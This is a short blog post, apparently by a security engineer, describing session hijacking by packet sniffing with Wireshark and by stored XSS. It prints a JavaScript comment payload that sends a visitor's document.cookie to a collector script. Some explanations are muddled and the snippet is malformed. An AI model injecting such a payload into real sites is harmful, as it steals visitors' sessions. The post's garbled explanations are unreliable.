Best Methods Hackers Use For Session Hijacking and Cookie Stealing In Web Browser

Cooking stealing, sometimes also known as session hijacking or cookie hijacking – because to steal a cookie a session must be hijacked. Cookie stealing or session hijacking is the exploitation of session on web browser to gain unauthorized access to information or services opened or saved in web browser. Cookie stealing is common among malicious hackers overtime because of that cookie stealing or session hijacking is hacking requires no special skills, if care is not taken, information of victim can be stolen effortlessly.

To perform session hijacking in order to steal cookie, there are some methods available and are being used by malicious hackers to perform session hacking or by web security tester to carry out penetration testing. In each method used in session and cookie hijacking, there are different tools used for each method.


The followings are 2 Best Methods To Perform Session Hijacking for Cookie Stealing:

1. Using of Packet Sniffers: Packet Sniffer or Packet Analyzer is also know as Protocol Analyzer or Network Analyzer is a software tool usually an open-source install-able on computer connected in network for network monitoring and analysis purposes by intercepting network traffic to capture and log packet first before analyzing them. To perform session hijacking to steal cookies , attacker must capture packet or log network traffic for analysis. To do this effectively, it is advised to use the best and popularly used network packet analyzer and monitoring tool like Wireshark.

network packet is a unit of data transmits in packet-switched network. A packet consists of control information (header) and user data which is also known as the payload. Data packet contains the source IP address, destination IP address and other information like service and protocol. 


How Network Packet Analyzer Capture Packet To Perform Session Hijacking and Cookie Stealing:

                         Step 1                                                   Step 2

Session Hijacking and Cookies Stealing     Session Hijacking and Cookies Stealing


2. Cross Site Scripting (XSS Attack): Attacker can also capture Session ID using XSS attack by using JavaScript code. Attacker sends or injects malicious JavaScript in a target website in order to exploit viewer of infected page. Infected page’s link is sent to victim to click on the link, one victim clink on the and malicious page opens, the JavaScript will run and perform malicious instructions by the attacker – usually to capture valid Session ID on victim’s browser. Read more

Attacker pastes the following code in the comment section a website, it would not reject because the would website thinks that its a server side code and it runs the code.

    document.write('<img src="http://localhost/submitcookie.php? cookie ='
    + escape(document.cookie) + '" />);
When the code is successfully posted which i manually or automatically approved, if any user visits page where this JavaScript code is posted as comment then the visitor might being monitored for Session hijacking and cookies can be stole in this way.

Olalekan Admin

Cyber Security Engineer